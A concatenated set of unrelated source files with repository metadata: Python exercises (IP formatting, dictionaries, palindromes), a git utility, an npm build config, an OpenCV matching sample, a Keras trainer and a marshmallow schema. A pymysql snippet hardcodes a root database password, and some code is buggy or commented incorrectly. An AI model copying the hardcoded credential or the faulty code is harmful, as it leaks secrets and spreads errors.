# -*- coding: utf-8 -*- ''' Задание 4.8 Преобразовать IP-адрес в двоичный формат и вывести на стандартный поток вывода вывод столбцами, таким образом: - первой строкой должны идти десятичные значения байтов - второй строкой двоичные значения Вывод должен быть упорядочен также, как в примере: - столбцами - ширина столбца 10 символов Пример вывода для адреса 10.1.1.1: 10 1 1 1 00001010 00000001 00000001 00000001 Ограничение: Все задания надо выполнять используя только пройденные темы. ''' ip = '192.168.3.1' ip_template = ''' {0:<10} {1:<10} {2:<10} {3:<10} {0:010b} {1:010b} {2:010b} {3:010b} ''' ip_split = ip.split('.') a = int(ip_split[0]) # Нужно перевести в число, b = int(ip_split[1]) # иначе будет ошибка, c = int(ip_split[2]) # ведь в шаблоне для перевода в двоичную систему d = int(ip_split[3]) # нужны числа, а не сторки print(ip_template.format(a, b, c, d))
[ "fortunaredux@protonmail.com" ]
fortunaredux@protonmail.com
bad8b52941b1e958f8939f396f6d4b4514d4af9c
c3d3e4684fdba127ffbaf71f714f7b481f3fe4b5
/gitutil.py
01cccf0e9b853be5d10b39dc0bb3b1a0eb1d2938
[ "Apache-2.0" ]
permissive
gulyasm/gitutil
3d06efc93caf162b98918b55d299170d75a22f2f
0923f05d9322be763d34e7d0c43b9cb4765aac4f
refs/heads/master
2021-01-01T17:42:36.791542
2013-10-14T14:50:59
2013-10-14T14:50:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
978
py
#!/usr/bin/python import sys import getopt import os import git def check_repo(folder, g): changed_str = "Changed" if g.is_dirty() else "Not changed" if g.is_dirty(): print g.working_dir.replace(folder, "", 1).ljust(70), g.active_branch.name.ljust(12), changed_str.ljust(20) def main(argv): folder = '' check = False try: opts, args = getopt.getopt(argv, 'r:c', ["root=", "check"]) except getopt.GetoptError: print('Usage: gitutil.py -r') sys.exit(2) for opt, arg in opts: if opt in ("-r", "--root"): folder = arg elif opt in ("-c", "--check"): check = True git_roots = [] for dirname, dirs, files in os.walk(folder): if ".git" in dirs: git_roots.append(dirname) dirs.remove(".git") for d in git_roots: g = git.Repo(d) if check: check_repo(folder, g) if __name__ == "__main__": main(sys.argv[1:])
[ "mgulyas86@gmail.com" ]
mgulyas86@gmail.com
e549a8235d2a5da545f99ea36ba537dabb3e169c
29f7aedaaa4a249e9581aa2398ba540d38b6fb28
/node_modules/fsevents/build/config.gypi
e65e2b2c0c848599c588d65b8fc4a7c6a79b3919
[ "MIT" ]
permissive
julissamackeydev/ChristianZaremba
61bac262809cc77b3d4a9abfaf7901a5ee246ccd
cd1bff1e43a9b96f84b3e48a4ef244d2f2de0420
refs/heads/master
2020-04-13T17:08:08.811741
2019-03-09T01:11:57
2019-03-09T01:11:57
163,339,764
0
0
null
null
null
null
UTF-8
Python
false
false
5,636
gypi
# Do not edit. File was generated by node-gyp's "configure" step { "target_defaults": { "cflags": [], "default_configuration": "Release", "defines": [], "include_dirs": [], "libraries": [] }, "variables": { "asan": 0, "build_v8_with_gn": "false", "coverage": "false", "debug_nghttp2": "false", "enable_lto": "false", "enable_pgo_generate": "false", "enable_pgo_use": "false", "force_dynamic_crt": 0, "host_arch": "x64", "icu_gyp_path": "tools/icu/icu-system.gyp", "icu_small": "false", "llvm_version": "0", "node_byteorder": "little", "node_debug_lib": "false", "node_enable_d8": "false", "node_enable_v8_vtunejit": "false", "node_experimental_http_parser": "false", "node_install_npm": "false", "node_module_version": 67, "node_no_browser_globals": "false", "node_prefix": "/usr/local/Cellar/node/11.3.0_1", "node_release_urlbase": "", "node_shared": "false", "node_shared_cares": "false", "node_shared_http_parser": "false", "node_shared_libuv": "false", "node_shared_nghttp2": "false", "node_shared_openssl": "false", "node_shared_zlib": "false", "node_tag": "", "node_target_type": "executable", "node_use_bundled_v8": "true", "node_use_dtrace": "true", "node_use_etw": "false", "node_use_large_pages": "false", "node_use_openssl": "true", "node_use_pch": "false", "node_use_v8_platform": "true", "node_with_ltcg": "false", "node_without_node_options": "false", "openssl_fips": "", "shlib_suffix": "67.dylib", "target_arch": "x64", "v8_enable_gdbjit": 0, "v8_enable_i18n_support": 1, "v8_enable_inspector": 1, "v8_no_strict_aliasing": 1, "v8_optimized_debug": 1, "v8_promise_internal_field_count": 1, "v8_random_seed": 0, "v8_trace_maps": 0, "v8_typed_array_max_size_in_heap": 0, "v8_use_snapshot": "true", "want_separate_host_toolset": 0, "xcode_version": "10.0", "nodedir": "/Users/julissamackey/.node-gyp/11.3.0", "standalone_static_library": 1, "fallback_to_build": "true", "module": "/Users/julissamackey/Code/ChristianZaremba/cz/node_modules/fsevents/lib/binding/Release/node-v67-darwin-x64/fse.node", "module_name": "fse", "module_path": "/Users/julissamackey/Code/ChristianZaremba/cz/node_modules/fsevents/lib/binding/Release/node-v67-darwin-x64", "napi_version": "3", "node_abi_napi": "napi", "save_dev": "", "legacy_bundling": "", "dry_run": "", "viewer": "man", "only": "", "commit_hooks": "true", "browser": "", "also": "", "sign_git_commit": "", "rollback": "true", "usage": "", "audit": "true", "globalignorefile": "/usr/local/etc/npmignore", "shell": "/bin/bash", "maxsockets": "50", "init_author_url": "", "shrinkwrap": "true", "parseable": "", "metrics_registry": "https://registry.npmjs.org/", "timing": "", "init_license": "ISC", "if_present": "", "sign_git_tag": "", "init_author_email": "", "cache_max": "Infinity", "preid": "", "long": "", "local_address": "", "git_tag_version": "true", "cert": "", "registry": "https://registry.npmjs.org/", "noproxy": "", "fetch_retries": "2", "versions": "", "message": "%s", "key": "", "globalconfig": "/usr/local/etc/npmrc", "prefer_online": "", "logs_max": "10", "always_auth": "", "global_style": "", "cache_lock_retries": "10", "update_notifier": "true", "heading": "npm", "audit_level": "low", "searchlimit": "20", "read_only": "", "offline": "", "fetch_retry_mintimeout": "10000", "json": "", "access": "", "allow_same_version": "", "https_proxy": "", "engine_strict": "", "description": "true", "userconfig": "/Users/julissamackey/.npmrc", "init_module": "/Users/julissamackey/.npm-init.js", "cidr": "", "user": "", "node_version": "11.3.0", "save": "true", "ignore_prepublish": "", "editor": "vi", "auth_type": "legacy", "tag": "latest", "script_shell": "", "progress": "true", "global": "", "searchstaleness": "900", "optional": "true", "ham_it_up": "", "save_prod": "", "force": "", "bin_links": "true", "searchopts": "", "node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js", "depth": "Infinity", "sso_poll_frequency": "500", "rebuild_bundle": "true", "unicode": "true", "fetch_retry_maxtimeout": "60000", "tag_version_prefix": "v", "strict_ssl": "true", "sso_type": "oauth", "scripts_prepend_node_path": "warn-only", "save_prefix": "^", "ca": "", "save_exact": "", "group": "20", "fetch_retry_factor": "10", "dev": "", "version": "", "prefer_offline": "", "cache_lock_stale": "60000", "otp": "", "cache_min": "10", "searchexclude": "", "cache": "/Users/julissamackey/.npm", "color": "true", "package_lock": "true", "package_lock_only": "", "save_optional": "", "ignore_scripts": "", "user_agent": "npm/6.4.1 node/v11.3.0 darwin x64", "cache_lock_wait": "10000", "production": "", "send_metrics": "", "save_bundle": "", "umask": "0022", "node_options": "", "init_version": "1.0.0", "init_author_name": "", "git": "git", "scope": "", "unsafe_perm": "true", "tmp": "/var/folders/03/yg7r2spx5w9886ps7ttl8j2r0000gn/T", "onload_script": "", "link": "", "prefix": "/usr/local" } }
[ "julissamackey@Julissas-MacBook-Air.local" ]
julissamackey@Julissas-MacBook-Air.local
920f4452d90e699d289148b8978d08ac6d9ab071
ca9ab449331c31c1046ddbdd09a7079a65024a8a
/data_structure/dict/dictionary-basic.py
f66a2c66a35de603ed5c996bb9c524f11ebfc656
[]
no_license
linth/learn-python
95947fd40f578d4473496c263ab45a7459fe4773
33c36b45c0dc46cf6d9a5d1237b63c8c2442b3fd
refs/heads/master
2023-04-28T17:08:06.473326
2023-04-24T17:09:41
2023-04-24T17:09:41
172,464,385
0
0
null
null
null
null
UTF-8
Python
false
false
1,583
py
# dictionary: key and value. dict = { "name": "George", "year": 2019, "sex": "boy", "weight": 78, "height": 190, } print(dict) # get value print(dict['year']) # first way to get value. x = dict.get('year') # another way to get value. print(x) # 2019. # change value dict['year'] = 2000 print(dict['year']) # 2000. # use for loop to show data for i in dict.keys(): # show keys. print('keys = ', i) # name, year, sex, weight, height. for x in dict.values(): # show value. print('values = ', x) # George, 2000, boy, 78, 190. for x, y in dict.items(): print(x, y) # name George, year 2000, sex boy, weight 78, height 190. # copy dictionary x = dict.copy() print(x) # {'name': 'George', 'year': 2000, 'sex': 'boy', 'weight': 78, 'height': 190} # add items. dict = { "name": "George", "year": 2019, "sex": "boy", "weight": 78, "height": 190, } dict['name'] = 'Peter' print(dict) # name Peter, year 2019, sex boy, weight 78, height 190. # remove item dict.pop('name') print(dict) # year 2019, sex boy, weight 78, height 190. z = dict.clear() # remove all data. print(z) # return None. # remove the lastinserted item dict = {"year": 2019, "sex": "boy", "weight": 78, "height": 190} dict.popitem() print(dict) # year 2019, sex boy, weight 78 # remove the specified key name. del dict['year'] print(dict) # sex boy, weight 78 # update, merge two dict # it's for python 2.x and it's not support to python 3 up. # dict1 = {"name": "George", "id": 1234} # dict2 = {"name": "Peter", "id": 3456} # print(dict1.update(dict2))
[ "zhua0404@gmail.com" ]
zhua0404@gmail.com
795ecff9237f19bcdee8d947768f501d043feb54
4c4bfbdd9540eb67d0379a8fc9c3e8ebcdb7e390
/solutions/PangHW/EOY2021/CODE3_S301_25_Ryan Theodore The.py
b86ae0181ee467066310aeaf522866d581e9c3b7
[]
no_license
theboi/competitive-programming
caf9634025edd0b28cf00aa6d6f494ae63eb6573
b77e756e38b6f1f91baf1c7bb6702e38487c895d
refs/heads/master
2023-08-21T07:51:38.783785
2021-10-25T06:49:50
2021-10-25T06:49:50
274,824,158
2
0
null
null
null
null
UTF-8
Python
false
false
688
py
def FindEnds(F): pre = [x[:2] for x in F] post = [x[1:] for x in F] print(pre, post) for i in range(len(F)): nex = i while nex != -1: visited = [] if post[i] in pre: startfrm = 0 nex = pre[startfrm:].index(post[i]) while not nex in visited: startfrm = nex+1 nex = pre[startfrm:].index(post[i]) visited.append(nex) print(nex) else: nex = -1 print(i) # driver #print(FindEnds(["SSS", "SST", "STX", "STX", "TXS", "TXT", "XSS", "XTT"]))
[ "ryan.the.2006@gmail.com" ]
ryan.the.2006@gmail.com
92f7307872dca44b336ed5abff40710a8a1f8571
4f749c99a15635d693933d725301bd5f15efcb94
/problem4/palindrome.py
01e1d2882d8fb11acfc068915f74cbe59c414f0f
[]
no_license
PCloherty/project_eular
c57cb0d478d8fd66e2c64b996795392aae9ebb17
4376b754a6a3222bf09400279d52d6c8ff6f766b
refs/heads/main
2023-01-29T07:48:50.347910
2020-12-09T14:29:33
2020-12-09T14:29:33
316,298,608
0
0
null
null
null
null
UTF-8
Python
false
false
1,597
py
# A palindromic number reads the same both ways. The largest palindrome made from the product # of two 2-digit numbers is 9009 = 91 × 99. # Find the largest palindrome made from the product of two 3-digit numbers. def main(): #definitions x = 100 y= 100 normal=0 reverse=0 highest={'x_value':0,'y_value':0,'palindrome':0} print('Currently working please wait...') #outer loop while x <= 1001: #innerloop while y <= 1001: #if the y loop reaches 1000, reset inner loop and increment once on outerloop if (y==1000): y=100 x=x+1 #if the x loop reaches 1000, break inner loop elif (x==1000): break #get number normal = x*y #turn the number into list of stings, reverse the list and join to get reverse number reverse=[str(i) for i in str(normal)] y=y+1 reverse.reverse() reverse="".join(reverse) #compare normal and reverse, if they are the same if(int(normal) == int(reverse)): if (normal > highest['palindrome']): highest['x_value']=x highest['y_value']=y highest['palindrome']=int(normal) print(highest) #break outerloop #906609 break print(f'Highest palindrome from two 3-digit numbers is {highest["palindrome"]} from {highest["x_value"]}*{highest["y_value"]}' ) main()
[ "p.cloherty@hotmail.co.uk" ]
p.cloherty@hotmail.co.uk
30365afeb3524db5724ccb54cc10342043d3baa8
5749aa612746b167c2f11ca9b4b2b8fe571f2426
/test/find_obj.py
6c9a4840f74b0d909355800cb23ace210f7db9ae
[]
no_license
donkaban/opencv-dist
767e73cb3d142c5889605cdedaba27922c9a0d17
efe36d61e448c850c8b5f63b06d5799ba6a6d9a1
refs/heads/master
2020-12-06T12:04:45.170174
2016-09-26T10:50:32
2016-09-26T10:50:32
66,547,963
0
0
null
null
null
null
UTF-8
Python
false
false
6,745
py
#!/usr/bin/env python ''' Feature-based image matching sample. Note, that you will need the https://github.com/Itseez/opencv_contrib repo for SIFT and SURF USAGE find_obj.py [--feature=<sift|surf|orb|akaze|brisk>[-flann]] [ <image1> <image2> ] --feature - Feature to use. Can be sift, surf, orb or brisk. Append '-flann' to feature name to use Flann-based matcher instead bruteforce. Press left mouse button on a feature point to see its matching point. ''' import sys import cv2 sys.path.append('/usr/local/lib/python2.7/site-packages') import numpy as np import cv2 from common import anorm, getsize FLANN_INDEX_KDTREE = 1 # bug: flann enums are missing FLANN_INDEX_LSH = 6 def init_feature(name): chunks = name.split('-') if chunks[0] == 'sift': detector = cv2.xfeatures2d.SIFT_create() norm = cv2.NORM_L2 elif chunks[0] == 'surf': detector = cv2.xfeatures2d.SURF_create(800) norm = cv2.NORM_L2 elif chunks[0] == 'orb': detector = cv2.ORB_create(400) norm = cv2.NORM_HAMMING elif chunks[0] == 'akaze': detector = cv2.AKAZE_create() norm = cv2.NORM_HAMMING elif chunks[0] == 'brisk': detector = cv2.BRISK_create() norm = cv2.NORM_HAMMING else: return None, None if 'flann' in chunks: if norm == cv2.NORM_L2: flann_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5) else: flann_params= dict(algorithm = FLANN_INDEX_LSH, table_number = 6, # 12 key_size = 12, # 20 multi_probe_level = 1) #2 matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329) else: matcher = cv2.BFMatcher(norm) return detector, matcher def filter_matches(kp1, kp2, matches, ratio = 0.75): mkp1, mkp2 = [], [] for m in matches: if len(m) == 2 and m[0].distance < m[1].distance * ratio: m = m[0] mkp1.append( kp1[m.queryIdx] ) mkp2.append( kp2[m.trainIdx] ) p1 = np.float32([kp.pt for kp in mkp1]) p2 = np.float32([kp.pt for kp in mkp2]) kp_pairs = zip(mkp1, mkp2) return p1, p2, kp_pairs def explore_match(win, img1, img2, kp_pairs, status = None, H = None): h1, w1 = img1.shape[:2] h2, w2 = img2.shape[:2] vis = np.zeros((max(h1, h2), w1+w2), np.uint8) vis[:h1, :w1] = img1 vis[:h2, w1:w1+w2] = img2 vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR) if H is not None: corners = np.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]]) corners = np.int32( cv2.perspectiveTransform(corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0) ) cv2.polylines(vis, [corners], True, (255, 255, 255)) if status is None: status = np.ones(len(kp_pairs), np.bool_) p1 = np.int32([kpp[0].pt for kpp in kp_pairs]) p2 = np.int32([kpp[1].pt for kpp in kp_pairs]) + (w1, 0) green = (0, 255, 0) red = (0, 0, 255) white = (255, 255, 255) kp_color = (51, 103, 236) for (x1, y1), (x2, y2), inlier in zip(p1, p2, status): if inlier: col = green cv2.circle(vis, (x1, y1), 2, col, -1) cv2.circle(vis, (x2, y2), 2, col, -1) else: col = red r = 2 thickness = 3 cv2.line(vis, (x1-r, y1-r), (x1+r, y1+r), col, thickness) cv2.line(vis, (x1-r, y1+r), (x1+r, y1-r), col, thickness) cv2.line(vis, (x2-r, y2-r), (x2+r, y2+r), col, thickness) cv2.line(vis, (x2-r, y2+r), (x2+r, y2-r), col, thickness) vis0 = vis.copy() for (x1, y1), (x2, y2), inlier in zip(p1, p2, status): if inlier: cv2.line(vis, (x1, y1), (x2, y2), green) cv2.imshow(win, vis) def onmouse(event, x, y, flags, param): cur_vis = vis if flags & cv2.EVENT_FLAG_LBUTTON: cur_vis = vis0.copy() r = 8 m = (anorm(p1 - (x, y)) < r) | (anorm(p2 - (x, y)) < r) idxs = np.where(m)[0] kp1s, kp2s = [], [] for i in idxs: (x1, y1), (x2, y2) = p1[i], p2[i] col = (red, green)[status[i]] cv2.line(cur_vis, (x1, y1), (x2, y2), col) kp1, kp2 = kp_pairs[i] kp1s.append(kp1) kp2s.append(kp2) cur_vis = cv2.drawKeypoints(cur_vis, kp1s, flags=4, color=kp_color) cur_vis[:,w1:] = cv2.drawKeypoints(cur_vis[:,w1:], kp2s, flags=4, color=kp_color) cv2.imshow(win, cur_vis) cv2.setMouseCallback(win, onmouse) return vis if __name__ == '__main__': #print __doc__ import sys, getopt opts, args = getopt.getopt(sys.argv[1:], '', ['feature=']) opts = dict(opts) feature_name = opts.get('--feature', 'sift') try: fn1, fn2 = args except: fn1 = '../data/box.png' fn2 = '../data/box_in_scene.png' img1 = cv2.imread(fn1, 0) img2 = cv2.imread(fn2, 0) detector, matcher = init_feature(feature_name) if img1 is None: print 'Failed to load fn1:', fn1 sys.exit(1) if img2 is None: print 'Failed to load fn2:', fn2 sys.exit(1) if detector is None: print 'unknown feature:', feature_name sys.exit(1) #print 'using', feature_name kp1, desc1 = detector.detectAndCompute(img1, None) kp2, desc2 = detector.detectAndCompute(img2, None) #print 'img1 - %d features, img2 - %d features' % (len(kp1), len(kp2)) # def match_and_draw(win): # print 'matching...' # raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2 # p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches) # if len(p1) >= 4: # H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0) # print '%d / %d inliers/matched' % (np.sum(status), len(status)) # else: # H, status = None, None # print '%d matches found, not enough for homography estimation' % len(p1) # # vis = explore_match(win, img1, img2, kp_pairs, status, H) raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2 p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches) if len(p1) >= 4: H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0) #print '%d / %d inliers/matched' % (np.sum(status), len(status)) print len(status) else: H, status = None, None print '%d matches found, not enough for homography estimation' % len(p1) #imatch_and_draw('find_obj') #cv2.waitKey() #cv2.destroyAllWindows()
[ "k.shabordin@cardsmobile.ru" ]
k.shabordin@cardsmobile.ru
77c68ab4c13cbce19d54670392e9faad998ac27a
2a1d97744fb9292c76842baaee8c87b9916d6013
/pymysql_test.py
da9ca8af82d614481fbcc307a77d7c3c2f9280ea
[]
no_license
kevinsay/pythonstudy
f5c508f2b4dd52d6927df50512c17910b2484730
be8ee5d30e2718aa2a97717e1b47ee9260e2f872
refs/heads/master
2020-05-16T01:26:58.992296
2019-04-22T01:13:46
2019-04-22T01:13:46
182,602,556
0
0
null
null
null
null
UTF-8
Python
false
false
458
py
import pymysql conn = pymysql.connect(host='127.0.0.1',port=3306,user='root',password='shiyutao2012',db='shiyutao') cursor = conn.cursor() sql = 'select * from mystudent' print(cursor.execute(sql)) # print(cursor.fetchall()) # add_infos=[("ax",28,'2018-11-11'),("ax1",28,'2018-11-11'),("ax2",28,'2018-11-11')] # # cursor.executemany('insert into mystudent(name,age,register_date) values(%s,%s,%s)',add_infos) # # conn.commit() print(cursor.fetchmany(3))
[ "syt_8091@163.com" ]
syt_8091@163.com
d348b2ed798851b3ca34bbfdcb624c6df23eb785
b107883be08ea56bd3a56ddb0e2dd8dacce7db2e
/src/polystar/pipeline/keras/trainer.py
db62a563eeff68041d0a316b49186f70f8caffa3
[]
no_license
PolySTAR-mtl/cv
ef7977b62577e520f6c69a9b7891c7f38e307028
27564abe89e7dff612e3630c31e080fae4164751
refs/heads/master
2023-05-01T16:45:19.777459
2021-05-30T10:36:10
2021-05-30T10:36:10
356,053,312
0
0
null
2021-05-30T10:36:11
2021-04-08T21:32:06
Python
UTF-8
Python
false
false
1,427
py
from dataclasses import dataclass, field from typing import List from numpy.core._multiarray_umath import ndarray from tensorflow.python.keras.callbacks import Callback from tensorflow.python.keras.models import Model from polystar.pipeline.keras.compilation_parameters import KerasCompilationParameters from polystar.pipeline.keras.data_preparator import KerasDataPreparator from polystar.pipeline.keras.model_preparator import KerasModelPreparator @dataclass class KerasTrainer: compilation_parameters: KerasCompilationParameters callbacks: List[Callback] data_preparator: KerasDataPreparator model_preparator: KerasModelPreparator = field(default_factory=KerasModelPreparator) max_epochs: int = 300 verbose: int = 0 def train( self, model: Model, train_images: ndarray, train_labels: ndarray, validation_images: ndarray, validation_labels: ndarray, ): model = self.model_preparator.prepare_model(model) model.compile(**self.compilation_parameters.__dict__) train_data, steps = self.data_preparator.prepare_training_data(train_images, train_labels) model.fit( x=train_data, validation_data=(validation_images, validation_labels), steps_per_epoch=steps, epochs=self.max_epochs, callbacks=self.callbacks, verbose=self.verbose, )
[ "mathieu@feedly.com" ]
mathieu@feedly.com
ad539ee8f8e0e2e4c16e5d93c63e04528c93d0ce
c492c46d15755a2c48dc1e7954a03d5d46d12136
/examples/echo/client.py
a4aa6da570f6d4823709c22c2f3d7889bb48a086
[ "MIT" ]
permissive
PhilipTrauner/highway.py
8985380d2f49d368798e17d87b0a0ecbc15a0e34
b5626dd82e4a4e7015f4bf5d80bf33a9d501d8d3
refs/heads/master
2021-03-16T10:18:42.448680
2017-10-14T19:27:16
2017-10-14T19:27:16
91,607,974
2
0
null
null
null
null
UTF-8
Python
false
false
329
py
from highway import Client from highway import Handler as Handler_ class Handler(Handler_): def __init__(self, websocket, base): super().__init__(websocket, base) client = Client(Handler, debug=True) @client.route("echo") async def echo(data, handler): await handler.send(data, "echo") client.start("localhost", 1337)
[ "philip.trauner@aol.com" ]
philip.trauner@aol.com
02ae2bc23f3e2eb1ae2eaa25d2b06540fd152327
109a8fb3e17ccf1efa6057d59441933ce678c2f0
/app/schemas/user_schema.py
39d4e7768ecc51aca1201755f784f6fcb9b635f7
[]
no_license
oulabla/rest_test
8daac7db642adb72a07a9662920bcbfd7b750fbf
fad8eb7bd253271706518b3ba6f117997ba08dfa
refs/heads/main
2023-08-27T07:39:15.079957
2021-10-15T15:56:02
2021-10-15T15:56:02
416,887,760
0
0
null
null
null
null
UTF-8
Python
false
false
801
py
from marshmallow import fields from . import BaseSchema from marshmallow_sqlalchemy import auto_field from marshmallow.fields import Date from marshmallow_sqlalchemy.fields import Nested from app.models.user import User from app.schemas.role_schema import RoleSchema from app.schemas.phone_schema import PhoneSchema class UserSchema(BaseSchema): class Meta: model=User load_instance=True dateformat = '%Y-%m-%dT%H:%M:%S' id = auto_field() name = auto_field() additional_info = auto_field() created_at = Date() updated_at = Date() roles = Nested(RoleSchema, many=True) phones = Nested(PhoneSchema, many=True) # def on_bind_field(self, field_name, field_obj): # super().on_bind_field(field_name, field_obj)
[ "=" ]
=